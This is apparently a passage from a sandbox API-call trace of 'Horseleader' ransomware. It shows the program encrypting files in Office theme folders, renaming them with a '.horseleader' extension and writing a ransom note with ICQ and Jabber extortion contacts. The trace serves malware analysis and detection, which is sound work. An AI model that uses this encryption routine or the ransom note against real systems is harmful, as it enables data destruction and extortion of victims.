shared\\themes14\\expeditn\\expeditn.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.elm.horseleader")) returned 1 [0247.112] GetProcessHeap () returned 0x780000 [0247.112] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EXPEDITN.INF", cAlternateFileName="")) returned 1 [0247.112] lstrcmpiW (lpString1="EXPEDITN.INF", lpString2="Windows") returned -1 [0247.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF") returned 81 [0247.112] StrStrIW (lpFirst="EXPEDITN.INF", lpSrch=".horseleader") returned 0x0 [0247.112] lstrcmpW (lpString1="EXPEDITN.INF", lpString2="#Decrypt#.txt") returned 1 [0247.112] lstrcmpW (lpString1="EXPEDITN.INF", lpString2="_uninstalling_.png") returned 1 [0247.112] lstrlenW (lpString=".testttjffg") returned 11 [0247.112] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF", lpSrch=".testttjffg") returned 0x0 [0247.112] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.112] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.112] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF") returned 81 [0247.115] StrStrW (lpFirst="EXPEDITN.INF", lpSrch=".txt") returned 0x0 [0247.115] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=597) returned 1 [0247.115] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x255, lpOverlapped=0x0) returned 1 [0247.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x255, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x255, lpOverlapped=0x0) returned 1 [0247.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 
[0247.118] CloseHandle (hObject=0x1a4) returned 1 [0247.118] GetProcessHeap () returned 0x780000 [0247.118] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.118] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF.horseleader") returned 93 [0247.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\expeditn.inf.horseleader")) returned 1 [0247.121] GetProcessHeap () returned 0x780000 [0247.121] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.121] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.121] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.121] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0247.121] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.122] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 
[0247.122] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.122] lstrlenW (lpString=".testttjffg") returned 11 [0247.122] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.122] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.122] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.123] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0247.123] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.123] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=5120) returned 1 [0247.123] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1400, lpOverlapped=0x0) returned 1 [0247.125] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.125] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1400, lpOverlapped=0x0) returned 1 [0247.125] SetFilePointerEx (in: 
hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.125] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.126] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.126] CloseHandle (hObject=0x1a4) returned 1 [0247.126] GetProcessHeap () returned 0x780000 [0247.126] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.126] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.horseleader") returned 92 [0247.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.horseleader")) returned 1 [0247.127] GetProcessHeap () returned 0x780000 [0247.127] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.127] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, 
nFileSizeHigh=0x0, nFileSizeLow=0xed34, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.128] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.128] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0247.128] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.128] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.128] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.128] lstrlenW (lpString=".testttjffg") returned 11 [0247.128] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.128] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.128] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.128] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0247.131] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.131] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=60724) returned 1 [0247.131] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.133] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.133] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.134] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.134] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.134] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.135] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4d34, lpOverlapped=0x0) returned 1 [0247.135] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb2cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.135] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4d34, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4d34, lpOverlapped=0x0) returned 1 [0247.135] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0247.136] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.136] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.136] CloseHandle (hObject=0x1a4) returned 1 [0247.136] GetProcessHeap () returned 0x780000 [0247.136] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.136] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.horseleader") returned 93 [0247.136] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.horseleader")) returned 1 [0247.137] GetProcessHeap () returned 0x780000 [0247.137] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.137] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xed34, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", 
cAlternateFileName="")) returned 0 [0247.138] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.138] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\#Decrypt#.txt") returned 82 [0247.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.138] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.138] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.139] lstrlenA (lpString="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") returned 1368 [0247.140] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.140] CloseHandle (hObject=0x158) returned 1 [0247.140] GetProcessHeap () returned 0x780000 [0247.140] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.140] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ICE", cAlternateFileName="")) returned 1 [0247.140] lstrcmpiW (lpString1="ICE", lpString2="Windows") returned -1 [0247.140] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned 63 [0247.141] lstrcmpW (lpString1="ICE", lpString2=".") returned 1 [0247.141] lstrcmpW (lpString1="ICE", lpString2="..") returned 1 [0247.141] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.141] GetProcessHeap () returned 0x780000 [0247.141] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7e2960 [0247.141] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*") returned 65 [0247.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.142] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\.") returned 65 [0247.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.142] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.143] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.143] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\..") returned 66 [0247.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.143] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0247.143] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ee600, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35ee600, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x109d0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ICE.ELM", cAlternateFileName="")) returned 1 [0247.143] lstrcmpiW (lpString1="ICE.ELM", lpString2="Windows") returned -1 [0247.143] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM") returned 71 [0247.143] StrStrIW (lpFirst="ICE.ELM", lpSrch=".horseleader") returned 0x0 [0247.143] lstrcmpW (lpString1="ICE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.143] lstrcmpW (lpString1="ICE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.143] lstrlenW (lpString=".testttjffg") returned 11 [0247.143] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.143] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.144] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.145] lstrlenW (lpString="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM") returned 71 [0247.145] StrStrW (lpFirst="ICE.ELM", lpSrch=".txt") returned 0x0 [0247.145] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=68048) returned 1 [0247.145] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.145] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.148] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.148] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, 